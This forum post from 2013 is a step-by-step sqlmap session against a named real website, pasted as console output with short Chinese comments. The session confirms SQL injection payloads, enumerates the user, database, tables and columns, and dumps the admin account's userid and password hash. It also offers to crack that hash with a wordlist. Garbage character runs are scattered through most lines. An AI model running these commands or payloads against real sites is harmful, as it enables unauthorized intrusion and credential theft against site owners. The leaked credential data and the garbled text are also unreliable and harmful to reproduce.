D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
8 Y$ u6 s1 O+ L: G- ~# bms "Mysql" --current-user /* 注解:获取当前用户名称
( K4 X# C; ], S4 \3 J sqlmap/0.9 - automatic SQL injection and database takeover tool- O7 H/ x4 j1 H& _# ^: {" h
http://sqlmap.sourceforge.net starting at: 16:53:54
0 i, z5 c$ o, K/ j7 R! k+ D[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' L8 k3 Z: f6 ]
session file
7 r6 b9 j0 X( z0 V& n) V4 y- `+ u6 o: Z* Y[16:53:54] [INFO] resuming injection data from session file7 c" |+ p% @6 T
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file g7 Z- Y2 @8 o% z
[16:53:54] [INFO] testing connection to the target url
* E9 A8 z: N( zsqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ b/ N- L/ e3 C3 ^) S' d$ Csts:. u# g& B# k4 n) F# ]
---
& S' W- E2 `: p6 g( lPlace: GET
9 \$ ]& _6 [/ x, Y" ]Parameter: id5 k7 P6 a9 G2 l$ l
Type: boolean-based blind
P# c3 S. d% R5 }4 t Title: AND boolean-based blind - WHERE or HAVING clause" U& ^* ^' B3 X! q' u
Payload: id=276 AND 799=799! m" p* Z7 p8 T8 f8 F
Type: error-based
' g1 e$ ?; o( P0 U# H7 U: P Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 ^' K) }$ G9 h! G0 ~ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 ?9 V2 h% ?" x; u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% a7 h: D5 `& d6 @3 N+ S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ r/ h3 k. u2 m8 }6 W6 ~
Type: UNION query
, H5 K3 j( R- C2 H( Y Title: MySQL UNION query (NULL) - 1 to 10 columns2 J! [$ K+ |* U8 b6 ~
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) ?9 B9 P! x) ~7 @: L& _
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 F) M, e, ?! X2 q2 A) l( I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 u! Y9 U# e; r. x! N( Y
Type: AND/OR time-based blind
6 j @* {$ ` [2 i8 G: S. E Title: MySQL > 5.0.11 AND time-based blind8 g/ b" N u' J; v
Payload: id=276 AND SLEEP(5)$ E" c5 k* }" T1 y% f
---' v- D3 ^! y6 N; \# I
[16:53:55] [INFO] the back-end DBMS is MySQL( V) m6 J' S3 B S0 s( Q( ?* j' [" k
web server operating system: Windows+ s R- p# H: K: ?" ~
web application technology: Apache 2.2.11, PHP 5.3.0
" R5 s- A5 _& c6 |( uback-end DBMS: MySQL 5.02 I6 f5 |, ]0 f" U1 W" {% ]$ ~3 q, E
[16:53:55] [INFO] fetching current user
2 h+ P9 X2 t# |! y4 U+ tcurrent user: 'root@localhost'
. ]6 C$ }# s4 e; E# E[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 y6 G" S' @5 v# b3 f: stput\www.wepost.com.hk' shutting down at: 16:53:58. q) _# i8 {! c
! m4 f; ^$ h& kD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
$ m9 e* Y+ d4 L+ j9 F( _ms "Mysql" --current-db /*当前数据库2 ^/ R9 g& R- c- |% H- G
sqlmap/0.9 - automatic SQL injection and database takeover tool
5 G ?; f6 T$ n2 N7 Z, Q) R$ b http://sqlmap.sourceforge.net starting at: 16:54:16
6 F$ H* D$ x: A# S. O+ E[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( s5 v& E7 p3 ?2 Q session file
8 i; M, C, g$ q[16:54:16] [INFO] resuming injection data from session file' E: P' W, n7 O) K
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 F1 V. u' F% T0 b[16:54:16] [INFO] testing connection to the target url
; y# T% a* P$ J& [* xsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ p& T6 P* `1 m. W% Z4 X
sts:
2 `0 v) o' l# B: [# Z8 n7 M6 R---# ^7 J5 B! [" r9 X
Place: GET" d5 m1 i$ A1 O: p: z$ V# [5 e& \
Parameter: id
v- d3 p" d7 Z" C Type: boolean-based blind, u8 K: h# d: V% l1 M P' J
Title: AND boolean-based blind - WHERE or HAVING clause
% @7 t, ~# a* i1 E Payload: id=276 AND 799=799
$ m4 y, Q3 I9 i Type: error-based- g8 s6 z' r% r
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& }5 [! E) [8 U. E; @) @ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' O i V/ u, ?6 ^5 d6 B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 ]1 U( Z* H8 ?% S1 c4 }" [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), _9 @% S: E+ O$ k
Type: UNION query
c% S8 l/ J: p. l5 f Title: MySQL UNION query (NULL) - 1 to 10 columns E& ?% T8 f4 o) w3 T' z/ e
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 b b: B2 D2 c8 F8 \(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 H3 I D! w# }7 J2 |2 @1 y
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& x- x" d& J8 H
Type: AND/OR time-based blind
3 @5 l0 m; w, R1 M Title: MySQL > 5.0.11 AND time-based blind, L+ J+ q" `/ `1 i* x- \
Payload: id=276 AND SLEEP(5)
+ Q. G/ l* o; U: J1 A4 |---5 k; y, ~" Q* U" w; ?3 d
[16:54:17] [INFO] the back-end DBMS is MySQL
" e. E% e" M) S2 x; yweb server operating system: Windows
# H2 Z. w5 G' a2 U1 v& t# Bweb application technology: Apache 2.2.11, PHP 5.3.0* ~4 l4 a( [; H7 P0 y, V
back-end DBMS: MySQL 5.08 M- Z5 H$ F# k) i( v- f3 Z
[16:54:17] [INFO] fetching current database: r, p3 y7 B( Z
current database: 'wepost'
3 A1 O; g2 O5 f! I7 n3 \[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 M* h ]. d4 n* L# ~, z# |
tput\www.wepost.com.hk' shutting down at: 16:54:18) W+ }) R! d! ]0 o
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) {; J9 ~! O7 A- x
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名8 A8 D9 }; G4 o( t
sqlmap/0.9 - automatic SQL injection and database takeover tool
2 h9 |8 v/ k& b1 [7 F http://sqlmap.sourceforge.net starting at: 16:55:25
5 H$ _% I6 x' |[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: n, Q2 @4 E/ s session file
$ m+ A x" t9 g3 I[16:55:25] [INFO] resuming injection data from session file9 D0 W0 }0 Z( S& s) n% u/ ^2 ?' d
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ j- p& u& l( `. n[16:55:25] [INFO] testing connection to the target url2 h% }8 z# R& p9 c/ m2 v7 D
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
K! T' [7 O$ J; Ists:( u- k9 [1 Q1 q( Z. `. r9 x
---
8 E" J7 M( D$ D3 G6 R ^6 T' Y% o; }Place: GET
+ Q% m8 J/ S' r: e" w; M j1 |: VParameter: id
; s- C6 _* I) b. i7 _; U Type: boolean-based blind( x; Q& S I+ E
Title: AND boolean-based blind - WHERE or HAVING clause
0 Z8 \- A/ q; k* L- K+ ^9 W a$ M Payload: id=276 AND 799=799
6 O/ P3 ~2 t Q0 |. x- k Type: error-based
: X3 S- e$ G, Q6 p* [- ?1 D: @" C5 d Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, d" g3 W% m- \9 C Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ S& D5 V7 B* Z$ i6 g% J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) ^! Q; R3 ?( D3 k' V; B* K* f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 Z2 I- _: T! _2 F Type: UNION query; ?+ W5 m' Y: W# N. j( x
Title: MySQL UNION query (NULL) - 1 to 10 columns/ T& z4 m9 e+ z- A7 D! P
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& m( _8 m- l' L( j( c( v, G, N! Y. C
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),# O+ s' }4 J7 A8 B6 m6 k
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 a; W, w2 e! I, d' B
Type: AND/OR time-based blind3 g* s0 u2 B3 P' J# ?' S3 J
Title: MySQL > 5.0.11 AND time-based blind D* K S- L4 k. A9 [. \
Payload: id=276 AND SLEEP(5)( y1 Q" q4 e! w* a! z+ P5 A
---5 }( L/ I8 O! z
[16:55:26] [INFO] the back-end DBMS is MySQL2 v. A2 v; b0 B2 O E. R
web server operating system: Windows5 v( @* J- o) W8 v( O4 U
web application technology: Apache 2.2.11, PHP 5.3.0% o, j) d0 t! t& c1 ^4 K8 k
back-end DBMS: MySQL 5.0
: ]. V; } t1 ^3 N1 d! q[16:55:26] [INFO] fetching tables for database 'wepost'
7 N3 i- n' ~; I2 r- v[16:55:27] [INFO] the SQL query used returns 6 entries, @0 z4 q$ o' k: f. d
Database: wepost
[, ^' c" m- E* z[6 tables]
5 T* N" D. ?' e$ ^3 P" ?( ^& Q2 h+-------------+
" F. Q6 J) X5 @' A% }1 Y% `, q& S| admin |
; T; C: R$ y+ W1 |5 [5 z9 W| article |
) O) B o; E7 k+ G* K% C" {9 E; @| contributor |
) p! o4 _" Q" O' s" a+ m| idea |
1 F w c" m/ q/ o o: o| image |
3 c& ^6 ^/ O( {4 x" B$ U! f| issue |0 U% X; e% `. C2 r& t
+-------------+- l7 u" D2 L7 a2 p- A
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 s- w* C1 _( d8 W# w
tput\www.wepost.com.hk' shutting down at: 16:55:33
; M" I, w5 s( I- i7 A4 M/ T! i* {7 c1 W* F4 v
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ L1 R! w2 u( ~* ]% {/ ?ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
T( B5 M5 B( G/ S* k( C6 R sqlmap/0.9 - automatic SQL injection and database takeover tool
4 A: |1 a3 W+ S! A+ U7 x http://sqlmap.sourceforge.net starting at: 16:56:06
$ j) }) B7 l1 p1 V1 T& Z& ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
- ]) @1 z% ?6 U9 A, csts:
4 j3 G" _0 i- X6 G8 l! y; y( a, w---5 ?3 g7 f) t$ w9 V" B5 C* o1 f0 ^
Place: GET
3 [; s `: m8 N" q2 VParameter: id, a/ K+ t8 a9 B
Type: boolean-based blind# _( H1 ^, K4 w5 |% j' i
Title: AND boolean-based blind - WHERE or HAVING clause
. u$ A: r3 B; d2 a" @. L6 Z8 ~ Payload: id=276 AND 799=7995 c, O/ `3 u# R$ G p2 R
Type: error-based- x" h( k8 ?/ j( R; p( H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- W5 x7 S8 Z! _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 U$ g- g8 ]; N0 R. R
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: v1 H6 P$ M! b1 x+ D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ S7 }. e$ m( U# b Type: UNION query) o# ]. N: r8 h h. S$ }, _% a
Title: MySQL UNION query (NULL) - 1 to 10 columns
' Q1 P/ @- `" F1 ?/ T) ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% E( M9 B3 X' V- H2 t0 K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 n f% W1 n1 l- O. {9 T) T% wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 v' w; j& D) m9 e7 w' x; n) t4 } Type: AND/OR time-based blind
7 h( j( E' h) }/ R5 M+ w5 U7 R! d Title: MySQL > 5.0.11 AND time-based blind
3 y& w# i1 p: k Payload: id=276 AND SLEEP(5)7 u0 m* ~ }+ y
---' ]6 u2 _) p( v: a- j
web server operating system: Windows
! q4 V2 u; q! d7 ^; R) S% E4 v# uweb application technology: Apache 2.2.11, PHP 5.3.0
, {4 q4 z3 [) ` j2 k$ X$ Wback-end DBMS: MySQL 5.0& v( `* k" \& D* r ^4 K! x& c1 m
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
# a* }* e1 c) k' M4 assion': wepost, wepost
2 T5 O( M2 T8 D0 l s1 @9 G" Y' cDatabase: wepost; L& I& @+ O( W4 e% l+ _; `& r; C8 K
Table: admin8 P$ F* ?: o: k. ]
[4 columns]
% s- H2 g! ^: s' t+----------+-------------+
* X4 x/ l, i$ k' Z X0 r$ A+ w }| Column | Type |
( w' s; j; J* d$ p" M3 ?+----------+-------------+5 R1 T) [/ t: K* Y* I; f+ o3 `
| id | int(11) | b& J+ G$ O4 p. F% r
| password | varchar(32) |
0 j3 i2 x* T# J| type | varchar(10) |1 S. B7 A% }$ z9 v
| userid | varchar(20) |
' a- F+ p" I8 d: |9 n' v* j( F) a8 a+----------+-------------+
! X3 o0 i* u6 a) b) P: w shutting down at: 16:56:19+ u; W$ C9 T, w8 q- t2 M& s
+ j# I2 y% s4 s3 d& x: j) S' l
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db g- `1 Y) w" [+ @, A+ d
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
+ n1 h* h. R0 j9 ^ sqlmap/0.9 - automatic SQL injection and database takeover tool
* C1 L( r# L6 Q* B7 M h4 `0 ? http://sqlmap.sourceforge.net starting at: 16:57:14
8 E9 _, C+ S/ qsqlmap identified the following injection points with a total of 0 HTTP(s) reque
; j8 q, B7 ]( L$ x; csts:
8 r N4 j& A' v" i" ]---% ^8 |; `3 G* k/ |) i9 K$ w) n
Place: GET
z' p! m/ f& L& a0 C# NParameter: id
; f) P( w# } {- M, [; q- w m- c Type: boolean-based blind
' C- S5 L0 p' B$ u& H Title: AND boolean-based blind - WHERE or HAVING clause6 ~7 F" f4 |; u# ?5 P4 A
Payload: id=276 AND 799=799: m+ `- [' A+ G8 R0 Z+ _0 I0 \5 O
Type: error-based5 X' v2 j/ r4 a7 j8 @8 { k2 d
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( x0 L8 J# L& ^ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) t% k1 o& A) [/ u
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# ]4 e# z8 z; L) {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* h( l' ~5 l" U2 i3 L, F: E! J Type: UNION query9 D! v; U- q8 W; V6 ^) d9 g5 j
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 W, L0 t* S# p4 J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) Y& ?! l* P( J8 c+ o7 J& p(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. H+ d3 x% {0 }/ A* m: k$ SCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. r/ q, k0 `& }* I
Type: AND/OR time-based blind
2 X) h. N4 i$ A' w Title: MySQL > 5.0.11 AND time-based blind
! {0 h. l: ` G4 X& D4 g Payload: id=276 AND SLEEP(5)
9 R) ?$ b9 K6 s+ |. i5 b5 v---
3 }, v, g1 _3 h! mweb server operating system: Windows
% L2 ~ b1 {5 l3 p# c7 K2 gweb application technology: Apache 2.2.11, PHP 5.3.0- T3 b2 T3 T# j% I" n* K
back-end DBMS: MySQL 5.0
. m5 R% m9 m$ b2 j8 h- _, X! jrecognized possible password hash values. do you want to use dictionary attack o
0 s/ n+ I0 X; _; k7 v% kn retrieved table items? [Y/n/q] y/ n% J1 q2 I. T
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
: M: a% I' ?) a: l) M% wdo you want to use common password suffixes? (slow!) [y/N] y4 p; B, H5 }: C. \! ?: C' o
Database: wepost# D5 q$ q9 V! C3 e0 t
Table: admin
6 R) G) A4 A U[1 entry]
' O4 K" ]( [8 A' J5 ^+----------------------------------+------------+
3 \( d1 q3 L v5 M0 K| password | userid |
4 w& t' u) j+ v+----------------------------------+------------+
6 V0 C6 r m; b6 || 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
X1 C4 c5 E" R8 @3 L$ i1 ?+----------------------------------+------------+
; [- N) C# w/ q$ ~/ Q# i shutting down at: 16:58:14
- W( H% w5 _% M" i) L2 w1 G
9 G1 o; b# b) I( A; ~8 H: e9 U& QD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对